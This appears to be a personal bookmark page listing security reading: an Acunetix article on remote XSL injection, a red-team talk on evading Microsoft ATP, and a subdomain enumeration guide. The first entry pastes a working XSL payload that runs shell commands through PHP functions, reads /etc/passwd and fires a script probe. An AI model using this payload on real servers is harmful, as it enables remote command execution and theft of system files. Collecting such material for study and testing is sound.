-
-
-
The hidden dangers of XSLTProcessor - Remote XSL injection | Acunetix
October 16, 2020 at 3:57:50 PM UTC * - permalink -<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl"> <xsl:template match="/"> <script>confirm("We're good");</script> <!-- <xsl:value-of select="php:function('exec','id')"/> <xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/> <xsl:copy-of select="document('/etc/passwd')"/> <xsl:value-of select="php:function('passthru','ls -la /')"/> --> <xsl:value-of select="php:function('passthru','ls -la /')"/> </xsl:template> </xsl:stylesheet>- https://www.acunetix.com/blog/articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/
-
-
-
-
-
-
![thumbnail]()
-
-
-
-
-
-
-
eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics.pdf
September 3, 2020 at 9:03:04 AM UTC - permalink -- http:///tmp/mozilla_onemask0/eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics.pdf
-
![thumbnail]()
-
-
Subdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings | by Eduard Toloza | Medium
August 28, 2020 at 5:00:25 PM UTC * - permalink -- https://medium.com/@edu4rdshl/subdomains-enumeration-what-is-how-to-do-it-monitoring-automation-using-webhooks-and-5e0a0c6d9127
-
![thumbnail]()
